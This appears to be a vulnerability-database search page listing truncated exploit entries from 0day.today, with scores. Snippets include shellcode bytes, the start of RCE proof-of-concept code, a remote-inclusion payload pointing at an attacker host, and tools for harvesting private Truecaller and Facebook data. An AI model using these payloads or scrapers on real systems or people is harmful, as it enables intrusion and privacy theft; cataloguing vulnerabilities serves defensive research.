Lucene search
K
ZdtMost viewed

39001 matches found

0day.today
0day.today
added 2024/02/01 12:0 a.m.963 views

Apache Tomcat 8.5.63 / 9.0.43 HTTP Response Smuggling Vulnerability

Apache Tomcat suffers from a client-side de-sync vulnerability via HTTP request smuggling. Apache Tomcat versions 8.5.7 through 8.5.63 and 9.0.0-M11 through 9.0.43 are vulnerable. Exploit Title: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling Date: 1/31/2024 Exploit Author: xer0dayz Vendor...

5.3CVSS6.4AI score0.14286EPSS
Exploits3
0day.today
0day.today
added 2019/04/30 12:0 a.m.962 views

Pimcore < 5.71 Unserialize Remote Code Execution Exploit

This Metasploit module exploits a PHP unserialize in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability. The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method makes it possible to...

8.8CVSS1AI score0.69356EPSS
Exploits5
0day.today
0day.today
added 2021/03/24 12:0 a.m.958 views

Magento 2.4.0 / 2.3.5p1 (and earlier) Arbitrary Code Execution 0day Exploit

Magento versions 2.4.0 and 2.3.5p1 and earlier are affected by an unsafe file upload vulnerability that could result in arbitrary code execution. This vulnerability could be abused by authenticated users with administrative permissions to the System/Data and Transfer/Import components...

9.1CVSS5.4AI score0.0552EPSS
Exploits1
0day.today
0day.today
added 2014/10/06 12:0 a.m.956 views

XAMPP 1.8.x Multiple Vulnerabilities

Exploit for multiple platform in category remote exploits Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities Author : DevilScreaM Date : 6 October 2014 Vendor : http://bitnami.com Version : 1.8.x or Higher Version Operating System : Windows / Linux Vulnerability : Cross Site Scripting / Write Fi...

7.1AI score
Exploits0
0day.today
0day.today
added 2017/10/25 12:0 a.m.952 views

Infoblox NetMRI 7.1.4 Shell Escape / Privilege Escalation Vulnerabilities

Exploit for hardware platform in category remote exploits Title: Infoblox NetMRI Administration Shell Escape and Privilege Escalation Advisory ID: KL-001-2017-017 Publication Date: 2017.10.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-017.txt 1. Vulnerability...

6.7AI score
Exploits0
0day.today
0day.today
added 2015/11/14 12:0 a.m.952 views

Truecaller search limit bypass and gathering information Exploit

this exploit will bypass the truecaller and get the datas of the user and phone number fully automated exploit to extract the data Usage Info 1.save file first as truecaller.py and send as generator.py 2.the run the program and enter the value what it asked and wait for few min the process will g...

7.1AI score
Exploits0
0day.today
0day.today
added 2021/09/27 12:0 a.m.949 views

XAMPP 7.4.3 - Local Privilege Escalation Vulnerability

Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation Exploit Author: Salman Asad @deathflash1411, email protected Original Author: Maximilian Barz @S1lkys Vendor Homepage: https://www.apachefriends.org Version: XAMPP 7.2.29, 7.3.x 7.3.16 & 7.4.x 7.4.4 Tested on: Windows 10 + XAMPP 7.3.10...

8.8CVSS0.4AI score0.2247EPSS
Exploits5
0day.today
0day.today
added 2020/07/19 12:0 a.m.946 views

WonderCMS 3.1.0 XSS / Directory Traversal / File Upload Vulnerabilities

Exploit for php platform in category web applications title: Multiple Vulnerabilities product: WonderCMS vulnerable version: =3.1.0 fixed version: - CVE number: - impact: High homepage: https://www.wondercms.com/ found: 2020-04-30 by: Calvin Phang Office Singapore SEC Consult Vulnerability Lab An...

0.2AI score
Exploits0
0day.today
0day.today
added 2018/11/11 12:0 a.m.943 views

Windows/x86 - Messagebox Shellcode 358 bytes

// Exploit Title : win32 Messagebox shellcode 358 bytes // Exploit Author : Febriyanto Nugroho email protected // Tested on : Windows 7 x86 Ultimate include include char shellcode= "\x31\xdb\xb3\x30\x29\xdc\x64\x8b\x03\x8b\x40\x0c\x8b" "\x58\x1c\x8b\x1b\x8b\x1b\x8b\x73\x08\x89\xf7\x89\x3c"...

0.4AI score
Exploits0
0day.today
0day.today
added 2018/01/25 12:0 a.m.943 views

GoAhead Web Server 2.5 < 3.6.5 - HTTPd LD_PRELOAD Arbitrary Module Load Exploit

This Metasploit module triggers an arbitrary shared library load vulnerability in GoAhead web server versions between 2.5 and that have the CGI module enabled. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...

6.8CVSS8.2AI score0.96327EPSS
Exploits15
0day.today
0day.today
added 2018/06/19 12:0 a.m.942 views

Redis-cli < 5.0 - Buffer Overflow Exploit

Exploit for linux platform in category local exploits Exploit Title: Redis-cli 5.0 - Buffer Overflow PoC Exploit Author: Fakhri Zulkifli Vendor Homepage: https://redis.io/ Software Link: https://redis.io/download Version: 5.0, 4.0, 3.2 Fixed on: 5.0, 4.0, 3.2 CVE : CVE-2018-12326 Buffer overflow ...

7.5AI score0.02678EPSS
Exploits5
0day.today
0day.today
added 2019/11/20 12:0 a.m.941 views

OpenNetAdmin 18.1.1 - Remote Code Execution Exploit

Exploit for php platform in category web applications Exploit Title: OpenNetAdmin v18.1.1 RCE Exploit Author: mattpascoe Vendor Homepage: http://opennetadmin.com/ Software Link: https://github.com/opennetadmin/ona Version: v18.1.1 Tested on: Linux !/bin/bash URL="$1" while true;do echo -n "$ ";...

0.1AI score
Exploits0
0day.today
0day.today
added 2020/03/23 12:0 a.m.937 views

Joomla com_hdwplayer 4.2 - (search.php) SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: Joomla! comhdwplayer 4.2 - 'search.php' SQL Injection Dork: inurl:"index.php?option=comhdwplayer" Exploit Author: qw3rTyTy Vendor Homepage: https://www.hdwplayer.com/ Software Link: https://www.hdwplayer.com/download/ Version: 4...

7.1AI score
Exploits0
0day.today
0day.today
added 2022/03/07 12:0 a.m.936 views

Apache APISIX Remote Code Execution Exploit

Apache APISIX has a default, built-in API token that can be used to obtain full access of the admin API. Access to this API allows for remote LUA code execution through the script parameter added in the 2.x version. This module also leverages another vulnerability to bypass th e IP restriction...

9.8CVSS8.5AI score0.96182EPSS
Exploits18
0day.today
0day.today
added 2020/03/26 12:0 a.m.936 views

SharePoint Workflows XOML Injection Exploit

This Metasploit module exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality. This module requires Metasploit: https://metasploit.com/download Current source:...

10CVSS0.5AI score0.99222EPSS
Exploits5
0day.today
0day.today
added 2017/01/24 12:0 a.m.933 views

Joomla 3.6.5 Remote code execution Exploit 0day

Joomla 3.6.5 Core suffers from a remote code execution vulnerability. Joomla Core affected Joomla! 3.6.X versions. Exploit automated. It is possible to specify a list of sites. For the work you need to install Python. This is private exploit. You can buy it at https://0day.today...

7.8AI score
Exploits0
0day.today
0day.today
added 2013/01/30 12:0 a.m.928 views

Wordpress plugins wp-catpro Arbitrary File Upload Vulnerability

The attacker can uplaod file/shell.php.gif 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site :...

7AI score
Exploits0
0day.today
0day.today
added 2022/08/25 12:0 a.m.927 views

Zimbra Zip Path Traversal Exploit

This Metasploit module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path traversal issue in Zimbra...

9.8CVSS8.5AI score0.98234EPSS
Exploits16
0day.today
0day.today
added 2021/11/11 12:0 a.m.923 views

Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (3)

Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution RCE 3 Exploit Author: Valentin Lobstein Vendor Homepage: https://apache.org/ Software Link: https://github.com/Balgogan/CVE-2021-41773 Version: Apache 2.4.49/2.4.50 CGI enabled Tested on: Debian GNU/Linux CVE : CVE-2021-41773 /...

9.8CVSS9.2AI score0.99992EPSS
Exploits174
0day.today
0day.today
added 2022/12/10 12:0 a.m.921 views

Ubuntu Server snap-confine must_mkdir_and_open_with_perms() Race Condition Vulnerability

Qualys discovered a race condition CVE-2022-3328 in snap-confine, a SUID-root program installed by default on Ubuntu. In this advisory,they tell the story of this vulnerability which was introduced in February 2022 by the patch for CVE-2021-44731 and detail how they exploited it in Ubuntu Server ...

7.8CVSS7.6AI score0.00974EPSS
Exploits9
0day.today
0day.today
added 2018/03/20 12:0 a.m.919 views

Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation Exploit

Exploit for linux platform in category local exploits / disablemapminadd.c / / / include include include include include include include / offsets might differ, kernel was custom compiled you can read vmlinux and caculate the offset when testing / / define OFFSETKERNELBASE 0x000000 / define...

2.1CVSS6.6AI score0.02084EPSS
Exploits5
0day.today
0day.today
added 2018/02/05 12:0 a.m.919 views

WordPress Core - load-scripts.php Denial of Service Exploit

Exploit for php platform in category dos / poc EDB Note: python doser.py -g...

7.5AI score0.73098EPSS
Exploits11
0day.today
0day.today
added 2022/04/19 12:0 a.m.918 views

7-zip - Code Execution / Local Privilege Escalation Exploit

Exploit Title: 7-zip - Code Execution / Local Privilege Escalation Exploit Author: Kağan Çapar Vendor homepage: https://www.7-zip.org/ Software link: https://www.7-zip.org/a/7z2107-x64.msi Version: 21.07 and all versions Tested On: Windows 10 Pro x64 References:...

7.8CVSS0.3AI score0.01523EPSS
Exploits8
0day.today
0day.today
added 2020/10/28 12:0 a.m.916 views

Facebook hidden profile data disclosure Exploit

This lets you gather a bunch of information, even if it is private. phone number, email, ip-address, birthday, etc. Material can automatically collect data and save, possible to connect a proxy list...

1.1AI score
Exploits0
0day.today
0day.today
added 2023/08/10 12:0 a.m.912 views

Maltrail v0.53 - Unauthenticated Remote Code Execution Exploit

Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution RCE Exploit Author: Iyaad Luqman K init6 Application: Maltrail v0.53 Tested on: Ubuntu 22.04 CVE: CVE-2023-27163 PoC import sys; import os; import base64; def main: listeningIP = None listeningPORT = None targetURL = None if...

6.5CVSS6.7AI score0.06976EPSS
Exploits29
0day.today
0day.today
added 2019/10/20 12:0 a.m.910 views

Microsoft Windows x64 – Privilege Escalation (UAC Protection Bypass printui.exe) Exploit

include include include include "resource.h" include include include define err -1 define dis 0 define def 1 define max 2 define BUFFER 8192 int CheckUac int ConsentAdmin; int EnableLua; DWORD BufferSize = BUFFER; RegGetValueHKEYLOCALMACHINE,...

0.4AI score
Exploits0
0day.today
0day.today
added 2023/02/28 12:0 a.m.909 views

WordPress WoodMart Theme 7.1.1 Cross Site Request Forgery Vulnerability

WordPress WoodMart Theme versions 7.1.1 and below suffer from a cross site request forgery vulnerability due to missing nonce validation on the processform function. ==== Z://USB-00RESEARCH/WORDPRESS/ ============================================= 2023 == Report Title: WordPress WoodMart Theme =...

6.9AI score
Exploits0
0day.today
0day.today
added 2011/04/08 12:0 a.m.907 views

WampServer 2.1 Remote File Download Exploit

Exploit for php platform in category web applications !/usr/bin/perl In The name of Allah Title : WampServer 2.1 Remote File Download Exploit Author : KedAns-Dz E-mail : email protected Home : HMD/AM 30008/04300 - Algeria -00213555248701 Twitter page : twitter.com/kedans platform : php Impact :...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/03/29 12:0 a.m.901 views

Drupal 7.0 < 7.31 - Drupalgeddon SQL Injection (Admin Session) Exploit

Exploit for php platform in category web applications //· include 'common.inc'; include 'password.inc'; // set values $username = 'admin'; $url = isset$argv1?$argv1:''; $userid = isset$argv2?intval$argv2:1; if $url == '-h' echo "usage:\n"; echo $argv0.' $url $userid'."\n"; die; if empty$url ||...

7.5CVSS0.3AI score0.99974EPSS
Exploits20
0day.today
0day.today
added 2018/02/28 12:0 a.m.896 views

Concrete5 < 8.3.0 - Username / Comments Enumeration Exploit

Exploit for php platform in category web applications !/usr/bin/env python3 Concrete5 8.3 vulnerable to Authorization Bypass Through User-Controlled Key IDOR CVE-2017-18195 Chapman R3naissance Schleiss from queue import Queue from threading import Thread from bs4 import BeautifulSoup from tabulat...

5CVSS5.8AI score0.11123EPSS
Exploits6
0day.today
0day.today
added 2015/03/03 12:0 a.m.896 views

Jetty 9.2.8 Shared Buffer Leakage Vulnerability

Gotham Digital Science discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests and responses submitted to the server by other users. Jetty versions 9.2.3 through 9.2.8 are affected...

5CVSS0.6AI score0.74881EPSS
Exploits16
0day.today
0day.today
added 2006/07/23 12:0 a.m.896 views

PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability

Exploit for unknown platform in category web applications ============================================================ PHP Live! ----------- Execution: help.php?csspath=htt://attacker setup/header.php?csspath=htt://attacker ----------- Vendor: At the moment, there are no solutions from the vendor...

7.1AI score
Exploits0
0day.today
0day.today
added 2022/06/07 12:0 a.m.895 views

Microsoft Office Word MSDTJS Code Execution Exploit

This Metasploit module generates a malicious Microsoft Word document that when loaded, will leverage the remote template feature to fetch an HTML document and then use the ms-msdt scheme to execute PowerShell code. This module requires Metasploit: https://metasploit.com/download Current source:...

7.8CVSS8.1AI score0.99374EPSS
Exploits62
0day.today
0day.today
added 2018/12/22 12:0 a.m.893 views

Netatalk < 3.1.12 - Authentication Bypass Exploit

Exploit Title: Netatalk Authentication Bypass Exploit Author: Jacob Baines Vendor Homepage: http://netatalk.sourceforge.net/ Software Link: https://sourceforge.net/projects/netatalk/files/ Version: Before 3.1.12 Tested on: Seagate NAS OS x8664 CVE : CVE-2018-1160 Advisory:...

10CVSS0.4AI score0.86539EPSS
Exploits10
0day.today
0day.today
added 2025/03/13 12:0 a.m.889 views

WordPress GPX Viewer 2.2.8 Arbitrary File Creation Exploit

import argparse import requests from requests.sessions import Session import time banner = """ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ █████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ███║██╔═████╗██╔════╝ ╚════██╗██╔══██╗ ██║ ██║...

8.8CVSS7AI score0.01619EPSS
Exploits3
0day.today
0day.today
added 2019/04/09 12:0 a.m.887 views

PHP 7.2 - imagecolormatch() Out of Band Heap Write Exploit

&c= Example: GET/POST /exploit.php?f=0x7fe83d1bb480&c=id++/dev/shm/titi Target: PHP 7.2.x Tested on: PHP 7.2.12 / buf = unsigned long safeemallocsizeofunsigned long, 5 im2-colorsTotal, 0; for x=0; xsx; x++ for y=0; ysy; y++ color = im2-pixelsyx; rgb = im1-tpixelsyx; bp = buf + color 5; bp++++; bp...

8.8CVSS0.2AI score0.65116EPSS
Exploits7
0day.today
0day.today
added 2010/09/05 12:0 a.m.886 views

PHPizabi v0.848b C1 HFP1 Reinstall Script Vulnerability

Exploit for php platform in category web applications ======================================================= PHPizabi v0.848b C1 HFP1 Reinstall Script Vulnerability ======================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 ...

7.1AI score
Exploits0
0day.today
0day.today
added 2020/08/01 12:0 a.m.885 views

SharePoint DataSet / DataTable Deserialization Exploit

A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated attacker to execute code within the context of the SharePoint application service. The privileges in this execution context are determined by the account that is specified when SharePoint...

7.8CVSS8.1AI score0.94243EPSS
Exploits10
0day.today
0day.today
added 2009/03/29 12:0 a.m.885 views

glFusion <= 1.1.2 COM_applyFilter()/order SQL Injection Exploit

Exploit for unknown platform in category web applications =============================================================== glFusion = 4.1 php.ini independent google dork: "Page created in" "seconds by glFusion" +RSS Vulnerability, sql injection in 'order' and 'direction' arguments: look...

7.1AI score
Exploits0
0day.today
0day.today
added 2021/02/26 12:0 a.m.884 views

Squid 4.14 / 5.0.5 Code Execution / Double Free Vulnerabilities

A Double-Free bug was found in Squid versions 4.14 and 5.0.5 when processing the "acl" directive on configuration files, more specifically the first and second addresses. This may allow arbitrary code execution on a Squid deployment on where the configuration files may be processed from untrusted...

7.4AI score
Exploits0
0day.today
0day.today
added 2022/05/12 12:0 a.m.881 views

Google Chrome 78.0.3904.70 - Remote Code Execution Exploit

Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution Exploit Author: deadlock Forrest Orr Type: RCE Platform: Windows Website: https://forrest-orr.net Twitter: https://twitter.com/ForrestOrr Vendor Homepage: https://www.google.com/chrome/ Software Link:...

8.8CVSS8.3AI score0.72977EPSS
Exploits4
0day.today
0day.today
added 2020/11/10 12:0 a.m.881 views

WordPress File Manager 6.8 Remote Code Execution Exploit

The WordPress File Manager wp-file-manager plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload or...

10CVSS1AI score0.97328EPSS
Exploits14
0day.today
0day.today
added 2022/08/02 12:0 a.m.880 views

uftpd 2.10 - Directory Traversal (Authenticated) Vulnerability

Exploit Title: uftpd 2.10 - Directory Traversal Authenticated Exploit Author: Aaron Esau arinerron Vendor Homepage: https://github.com/troglobit/uftpd Software Link: https://github.com/troglobit/uftpd Version: 2.7 to 2.10 Tested on: Linux CVE : CVE-2020-20277 Reference:...

9.8CVSS9.7AI score0.25249EPSS
Exploits4
0day.today
0day.today
added 2020/08/15 12:0 a.m.878 views

WebKit On iOS PAC / JIT Hardening Bypass Vulnerability

PAC and JIT Hardening Bypass in WebKit on iOS As per discussions with email protected, Apple would like to treat the PAC bypass described here as a security vulnerability by itself. The bypass was initially reported without a deadline on May 6. After receiving the reply that they will treat it as...

8.8CVSS0.02163EPSS
Exploits1
0day.today
0day.today
added 2023/02/01 12:0 a.m.877 views

Hikvision Remote Code Execution / XSS / SQL Injection Vulnerabilities

Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution command injection vulnerabilities, including reflected cross site scripting, Ruby code injection, classic and blind SQL injection resulting in remote code execution that allows an adversary to execute arbitrary...

9.8CVSS9.7AI score0.49858EPSS
Exploits6
0day.today
0day.today
added 2015/07/13 12:0 a.m.874 views

phpVibe - Aribtrary File Disclosure Vulnerability

Exploit for php platform in category web applications In The Name Of ALLAH Exploit Title: phpVibe ALL versions LFD vulnerability Google Dork: "powered by phpvibe" Date: 2015/07/13 july 13th Exploit Author: ali ahmady -- Iranian Security Researcher snip3rirathotmail.com Vendor Homepage:...

7.1AI score
Exploits0
0day.today
0day.today
added 2016/12/23 12:0 a.m.873 views

Apache mod_session_crypto - Padding Oracle Vulnerability

Apache modsessioncrypto versions 2.3 through 2.5 suffer form a padding oracle vulnerability. Padding Oracle in Apache modsessioncrypto During a penetration test, RedTeam Pentesting discovered a Padding Oracle vulnerability in modsessioncrypto of the Apache web server. This vulnerability can be...

5CVSS7.8AI score0.49024EPSS
Exploits4
0day.today
0day.today
added 2021/04/07 12:0 a.m.868 views

Gogs Git Hooks Remote Code Execution Exploit

This Metasploit module leverages an insecure setting to get remote code execution on the target OS in the context of the user running Gogs. This is possible when the current user is allowed to create git hooks, which is the default for administrative users. For non-administrative users, the...

7.2CVSS7.3AI score0.93691EPSS
Exploits13
0day.today
0day.today
added 2020/07/30 12:0 a.m.868 views

Wordpress Maintenance Mode by SeedProd 5.1.1 Plugin - Persistent Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting Vendor Homepage: https://www.seedprod.com/ Vendor Changelog: https://wordpress.org/plugins/coming-soon/developers Exploit Author: Jinson...

3.5CVSS5.5AI score0.03757EPSS
Exploits5
0day.today
0day.today
added 2012/03/30 12:0 a.m.866 views

WeBID CSRF Vulnerability (All Version)

Exploit for php platform in category web applications Title : WeBID CSRF Vulnerability All Version Author : L3b-r1'z Date : 12.MAR.30 Security : LOW Google Dork : allintext: "powered by webid" Note : Works IF magicquotesgpc = off . P0C : Example Site : http://mcs-1.com/ http://usedwiiu.com/...

7.1AI score
Exploits0
Total number of security vulnerabilities5000